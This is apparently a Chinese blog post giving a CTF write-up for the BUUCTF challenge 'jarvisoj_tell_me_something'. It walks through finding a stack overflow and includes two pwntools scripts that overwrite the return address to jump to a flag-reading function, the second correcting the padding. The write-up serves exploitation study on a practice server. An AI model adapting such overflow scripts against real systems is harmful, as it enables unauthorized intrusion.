[buuctf]jarvisoj_tell_me_something 1

首先checksec一下文件
image
在用ida打开
image
发现这里存在一个明显栈溢出
image
这里似乎发现个函数可以直接读取flag,反编译在确认一下
image
可以看到确实可以读取flag,那就直接进行栈溢出,然后跳转执行这个函数就可以了

点击查看代码
from pwn import *
io=remote("node5.buuoj.cn",29464)
payload=b'A'*(0x88+8)+p64(0x400620)
io.sendline(payload)
io.interactive()
第一次写了这样的一个脚本,发现打不通,尬住了 然后看了一下main函数的汇编发现,这里没有push rbp ,最后也没有leave的命令,所以在进行溢出时就不用覆盖rbp了

image

改进的脚本如下

点击查看代码
from pwn import *
io=remote("node5.buuoj.cn",29464)
payload=b'A'*(0x88)+p64(0x400620)
io.sendline(payload)
io.interactive()

成功打通获得flag

image

posted @ 2025-07-03 17:37  Rye01R  阅读(34)  评论(0)    收藏  举报